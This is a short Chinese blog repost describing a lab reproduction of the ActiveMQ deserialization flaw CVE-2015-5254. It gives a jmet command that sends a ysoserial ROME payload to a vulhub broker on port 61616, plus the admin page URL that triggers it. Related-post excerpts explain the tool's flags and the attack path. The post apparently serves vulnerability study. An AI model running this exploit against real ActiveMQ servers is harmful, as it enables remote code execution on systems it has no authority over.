ActiveMQ 反序列化漏洞（CVE-2015-5254）

最新推荐文章于 2024-04-30 00:10:35 发布

转载最新推荐文章于 2024-04-30 00:10:35 发布 · 403 阅读

0 ·

CC 4.0 BY-SA版权

原文链接：http://www.cnblogs.com/mrhonest/p/11338697.html

文章标签：

#java

本文详细分析了ActiveMQ在2015年曝出的安全漏洞CVE-2015-5254，探讨了该漏洞的成因、影响范围及修复措施。通过实际案例，展示了如何利用特定命令行参数触发漏洞，以及如何检查系统是否受到影响。文章最后提供了官方和社区的参考资料，帮助读者深入理解并防范此类安全风险。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.245.130 61616

未创建

查看,点击消息列队,需登录

http://192.168.245.130:8161/admin/browse.jsp?JMSDestination=event

成功

模仿自:https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.md

转载于:https://www.cnblogs.com/mrhonest/p/11338697.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ddr12231

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

ActiveMQ 反序列化漏洞复现(CVE-2015-5254)

m0_59839948的博客

09-05

1943

广东东软学院的学生，web安全技术漏洞复现可以参考

阿一网络安全学院课堂作业——ActiveMQ 反序列化漏洞 (CVE-2015-5254)

Ayixy的博客

05-24

1023

ActiveMQ模块，-s 是选择ysoserial payload ，-Y 是攻击模式和内容， -Yp 是选择攻击利⽤链，这是。【命令解释】：调⽤java -jar 运⾏ jmet的jar包，-Q是插⼊⼀个名为event的队列，-I 是选择装载。阿⾥云ip为公⽹，公⽹⽆法找到内⽹ip，所以不成。使⽤命令：nmap -p- -A -O 192.168.110.145（需切换到root在执⾏）3.没有查看队列所有消息的⽤户名和密码下，只能管理员/⽤户去点击我们插⼊的消息才能触发（⽐较鸡。

参与评论您还未登录，请先登录后发表或查看评论

【漏洞复现】---- ActiveMQ 反序列化漏洞（CVE-2015-5254）

qq_43168364的博客

09-04

828

一、简介 Apache ActiveMQ是老外所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。攻击者可以借助特制的序列化的java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。漏洞影响的版本为：Apache ActiveMQ 5.13.0之前的版本。二、漏洞环境准备 pull下来内容环境运行后，将监听61616和8161两个端口。其中61616是工作端口，消息在这个端口进行传递

ActiveMQ 反序列化漏洞(CVE-2015-5254)

晚风不及你

03-15

353

漏洞编号 CVE-2015-5254 漏洞描述 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中，JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞，远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。漏洞影响 Apache ActiveMQ 5.x ~ 5.13.0 漏洞利用 1.vulhub使用dock

ActiveMQ 反序列化漏洞（CVE-2015-5254）利用工具

08-15

在2015年，ActiveMQ被发现存在一个严重的安全漏洞，被称为CVE-2015-5254，这是一个反序列化漏洞，允许攻击者通过精心构造的恶意消息来执行任意代码，从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...

ActiveMQ 反序列化漏洞 (CVE-2015-5254)

m0_74402888的博客

04-30

1681

1.在IDEA中建立好了SpringBoot项目，并配置好了docker容器，然后在执行Dockerfile时出现以下问题Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting head..._registry-1.docker.io。其中61616端口是工作端口，消息在这个端口上传递；

ActiveMQ 反序列化漏洞CVE-2015-5254

最新发布

12-28

### ActiveMQ 反序列化漏洞 CVE-2015-5254 的影响范围 Apache ActiveMQ 是一款由 Apache 软件基金会开发的开源消息中间件，广泛应用于分布式应用程序之间的通信。然而，在特定版本中存在严重的反序列化漏洞（CVE-...

ActiveMQ反序列化漏洞（CVE-2015-5254）

Kevin's Blog

06-02

2021

文章目录一、介绍1.1 简介1.2 影响版本1.3 漏洞成因1.4 利用限制1.4 业务场景1.5 使用概率二、模拟环境三、漏洞利用3.1 信息收集3.2 漏洞复现一、介绍 1.1 简介 Apache的一款JAVA开源消息中间件，支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。消息队列组件：分布式系统中的重要组件，主要解决应用耦合、异步消息、流量削峰等 1.2 影响版本 Apache ActiveMQ < 5.x 1.3 漏洞成因漏洞没有限制在代理

【CVE】CVE-2015-5254：ActiveMQ 反序列化漏洞利用

边扯边淡

03-15

2018

起序：复现不难，就是需要好好的准备好靶场环境。一、靶场环境使用的是 github 上的 vulhub 环境。ActiveMQ 版本为 5.11.1。 vulhub：https://github.com/vulhub/vulhub 1、漏洞：反序列化漏洞该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务（JMS）ObjectMessage对象利用该漏洞执行任意代码。 2、影响版本 ActiveMQ < 5.13.0 之前 5.x 版本。 .

activemq_CVE-2015-5254_漏洞复现_源码分析

qq_51550750的博客

06-03

873

ActiveMQ-CVE-2015-5254

ActiveMQ反序列化漏洞 CVE-2015-5254 漏洞复现

ADummy的博客

02-20

307

ActiveMQ反序列化漏洞 by ADummy 0x00利用路线构造（可以使用ysoserial）可执行命令的序列化对象—>发送给目标61616端口—>访问web管理页面，读取消息，触发漏洞—>代码执行 0x01漏洞介绍 Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务，集群，Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞，该漏洞源于程序

ActiveMQ CVE-2015-5254 分析

示例和笔记

06-07

506

ActiveMQ CVE-2015-5254 该漏洞是由于缺少对序列化数据的校验而导致，攻击者可以在序列化的数据中注入恶意代码。当 ActiveMQ 接收到该序列化数据并尝试反序列化时，将会执行这段恶意代码，从而实现攻击目的。具体来说，该漏洞的发生是由于 ActiveMQ 的两个缺陷导致。首先是方法中的缺陷，该方法将异常对象序列化为字节数组，这个字节数组包含了cause内的异常和message内的信息。攻击者可以构造精心设计的cause和message来注入恶意代码。接着，ActiveMQ 的与。